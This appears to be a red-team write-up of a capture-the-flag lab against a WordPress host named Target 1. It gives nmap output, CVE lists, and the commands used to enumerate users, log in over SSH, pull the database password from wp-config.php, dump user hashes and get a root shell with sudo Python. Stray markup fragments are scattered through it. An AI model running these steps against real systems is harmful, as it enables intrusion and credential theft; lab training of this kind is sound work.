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# Red Team: Summary of Operations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## Table of Contents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- Exposed Services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- Critical Vulnerabilities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- Exploitation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### Exposed Services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```bash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root@Kali:~# nmap -A 192.168.1.110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Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-08 14:32 PST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Nmap scan report for 192.168.1.110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Host is up (0.0012s latency).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Not shown: 995 closed ports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PORT    STATE SERVICE     VERSION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22/tcp  open  ssh         OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)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ssh-hostkey: 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1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)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2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)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256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)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|_  256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)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80/tcp  open  http        Apache httpd 2.4.10 ((Debian))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|_http-server-header: Apache/2.4.10 (Debian)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|_http-title: Raven Security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111/tcp open  rpcbind     2-4 (RPC #100000)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rpcinfo: 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program version    port/proto  service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100000  2,3,4        111/tcp   rpcbind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100000  2,3,4        111/udp   rpcbind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100000  3,4          111/tcp6  rpcbind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100000  3,4          111/udp6  rpcbind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100024  1          35727/udp   status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100024  1          36276/udp6  status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100024  1          55341/tcp6  status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|_  100024  1          59600/tcp   status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139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)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445/tcp open  netbios-ssn Samba smbd 4.2.14-Debian (workgroup: WORKGROUP)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MAC Address: 00:15:5D:00:04:10 (Microsoft)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Device type: general purpose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Running: Linux 3.X|4.X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OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4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OS details: Linux 3.2 - 4.9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Network Distance: 1 hop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Service Info: Host: TARGET1; OS: Linux; CPE: cpe:/o:linux:linux_kernel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Host script results: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|_clock-skew: mean: -3h39m59s, deviation: 6h21m02s, median: 0s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|_nbstat: NetBIOS name: TARGET1, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)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smb-os-discovery: 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OS: Windows 6.1 (Samba 4.2.14-Debian)                                                                         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Computer name: raven                                                                                          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NetBIOS computer name: TARGET1\x00                                                                            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Domain name: local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FQDN: raven.local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|_  System time: 2021-03-09T09:32:15+11:00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smb-security-mode: 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account_used: guest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authentication_level: user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challenge_response: supported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|_  message_signing: disabled (dangerous, but default)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smb2-security-mode: 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2.02: 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|_    Message signing enabled but not required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smb2-time: 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   date: 2021-03-08T22:32:15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|_  start_date: N/A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TRACEROUTE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HOP RTT     ADDRESS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1   1.25 ms 192.168.1.110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OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .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Nmap done: 1 IP address (1 host up) scanned in 14.93 seconds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```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- Target 1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Port 22 - SSH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Port 80 - HTTP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Port 111 - NFS / RPC Bind functions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Port 139 - Samba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Port 445 - Samba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- Target 1 SSH Vulnerabilities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CVE-2015-5600   8.5     https://vulners.com/cve/CVE-2015-5600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CVE-2015-6564   6.9     https://vulners.com/cve/CVE-2015-6564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CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919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CVE-2017-15906  5.0     https://vulners.com/cve/CVE-2017-15906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SSV:90447       4.6     https://vulners.com/seebug/SSV:90447    *EXPLOIT*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EDB-ID:45233    4.6     https://vulners.com/exploitdb/EDB-ID:45233      *EXPLOIT*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EDB-ID:45210    4.6     https://vulners.com/exploitdb/EDB-ID:45210      *EXPLOIT*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EDB-ID:45001    4.6     https://vulners.com/exploitdb/EDB-ID:45001      *EXPLOIT*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EDB-ID:45000    4.6     https://vulners.com/exploitdb/EDB-ID:45000      *EXPLOIT*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EDB-ID:40963    4.6     https://vulners.com/exploitdb/EDB-ID:40963      *EXPLOIT*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EDB-ID:40962    4.6     https://vulners.com/exploitdb/EDB-ID:40962      *EXPLOIT*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CVE-2016-0778   4.6     https://vulners.com/cve/CVE-2016-0778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CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145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CVE-2015-5352   4.3     https://vulners.com/cve/CVE-2015-5352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CVE-2016-0777   4.0     https://vulners.com/cve/CVE-2016-0777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 CVE-2015-6563   1.9     https://vulners.com/cve/CVE-2015-6563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- Target 1 Apache (HTTP) Vulnerabilities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CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679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CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668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CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169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CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167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CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312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CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715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CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788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CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217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EDB-ID:47689    5.8     https://vulners.com/exploitdb/EDB-ID:47689      *EXPLOIT*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CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927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CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098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- 1337DAY-ID-33577 5.8    https://vulners.com/zdt/1337DAY-ID-33577        *EXPLOIT*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CVE-2016-5387   5.1     https://vulners.com/cve/CVE-2016-5387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SSV:96537       5.0     https://vulners.com/seebug/SSV:96537    *EXPLOIT*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MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED  5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED *EXPLOIT*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EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7 5.0  https://vulners.com/exploitpack/EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7  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EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D  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CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934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CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220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CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199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CVE-2018-17189  5.0     https://vulners.com/cve/CVE-2018-17189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CVE-2018-1303   5.0     https://vulners.com/cve/CVE-2018-1303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CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798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CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710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CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743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CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161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CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736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CVE-2015-3183   5.0     https://vulners.com/cve/CVE-2015-3183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CVE-2015-0228   5.0     https://vulners.com/cve/CVE-2015-0228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CVE-2014-3583   5.0     https://vulners.com/cve/CVE-2014-3583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- 1337DAY-ID-28573        5.0     https://vulners.com/zdt/1337DAY-ID-28573        *EXPLOIT*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- 1337DAY-ID-26574        5.0     https://vulners.com/zdt/1337DAY-ID-26574        *EXPLOIT*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EDB-ID:47688    4.3     https://vulners.com/exploitdb/EDB-ID:47688      *EXPLOIT*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CVE-2020-11985  4.3     https://vulners.com/cve/CVE-2020-11985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CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092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CVE-2018-1302   4.3     https://vulners.com/cve/CVE-2018-1302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CVE-2018-1301   4.3     https://vulners.com/cve/CVE-2018-1301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CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975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CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185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CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109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- 1337DAY-ID-33575        4.3     https://vulners.com/zdt/1337DAY-ID-33575        *EXPLOIT*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CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283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CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612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PACKETSTORM:140265      0.0     https://vulners.com/packetstorm/PACKETSTORM:140265      *EXPLOIT*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EDB-ID:42745    0.0     https://vulners.com/exploitdb/EDB-ID:42745      *EXPLOIT*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EDB-ID:40961    0.0     https://vulners.com/exploitdb/EDB-ID:40961      *EXPLOIT*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- 1337DAY-ID-601  0.0     https://vulners.com/zdt/1337DAY-ID-601  *EXPLOIT*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- 1337DAY-ID-2237 0.0     https://vulners.com/zdt/1337DAY-ID-2237 *EXPLOIT*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- 1337DAY-ID-1415 0.0     https://vulners.com/zdt/1337DAY-ID-1415 *EXPLOIT*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- 1337DAY-ID-1161 0.0     https://vulners.com/zdt/1337DAY-ID-1161 *EXPLOIT*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### Exploitation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The Red Team was able to penetrate `Target 1` and retrieve the following confidential data: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- Target 1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- `flag1.txt`: b9bbcb33e11b80be759c4e844862482d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- **Exploit Used**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Harvest of usernames from WordPress site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 - wpscan --url http://192.168.1.110/wordpress -e u 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943600" cy="1333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SSH Insecure Password (Password = username)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ssh michael@192.168.1.110 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grep -r /var/www/ flag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943600" cy="3530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- `flag2.txt`: fc3fd58dcdad9ab23faca6e9a36e581c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- **Exploit Used**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Directory traversal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find / -name **flag** 2&gt;/dev/null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943600" cy="3771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- `flag3.txt`: afc01ab56b50591e7dccf93122770cd2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- **Exploit Used**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Password was extracted from the wordpress setup to allow root access to the mysql database.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grep DB_PASSWORD wp-config.php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943600" cy="584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use wordpress; select * from wp_users;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use wordpress; select * from wp_posts;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943600" cy="3441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- `flag4.txt`: 715dea6c055b9fe3337544932f2941ce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- **Exploit Used**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mysql harvest of user password hashes and the reuse of passwords allowed for escalation to a sudo user.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John the ripper utilized to uncover Steven's Password.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943600" cy="1752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Privelege escalation through sudo with Python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sudo python -c 'import pty;pty.spawn("/bin/bash")'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4619625" cy="4286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 - Flag 4 was found using find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943600" cy="3378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